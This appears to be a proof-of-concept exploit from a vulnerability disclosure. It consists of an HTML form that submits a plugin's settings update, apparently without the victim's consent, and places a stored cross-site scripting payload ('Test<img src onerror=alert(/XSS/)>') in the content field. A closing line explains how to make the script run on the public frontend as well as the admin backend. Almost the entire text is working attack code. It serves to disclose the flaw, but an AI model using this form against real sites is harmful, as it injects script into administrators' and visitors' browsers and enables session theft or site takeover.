XSS only in backend:

    <form action="" method="POST">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="frequency" value="0" />
      <input type="hidden" name="custom_frequency" value="0" />
      <input type="hidden" name="custom_frequency_type" value="0" />
      <input type="hidden" name="auto_closing" value="50" />
      <input type="hidden" name="content" value="Test<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="bg_opacity" value="0" />
      <input type="hidden" name="position_left" value="2.00" />
      <input type="hidden" name="position_top" value="2.00" />
      <input type="hidden" name="design" value="default|white" />
      <input type="hidden" name="fontfamily" value="0" />
      <input type="hidden" name="fontsize" value="15" />
      <input type="hidden" name="box_size_width" value="" />
      <input type="hidden" name="box_size_width_type" value="0" />
      <input type="hidden" name="box_size_height" value="" />
      <input type="hidden" name="box_size_height_type" value="0" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />

To have XSS triggered in both frontend and backend, add <input type="hidden" name="active" value="on" />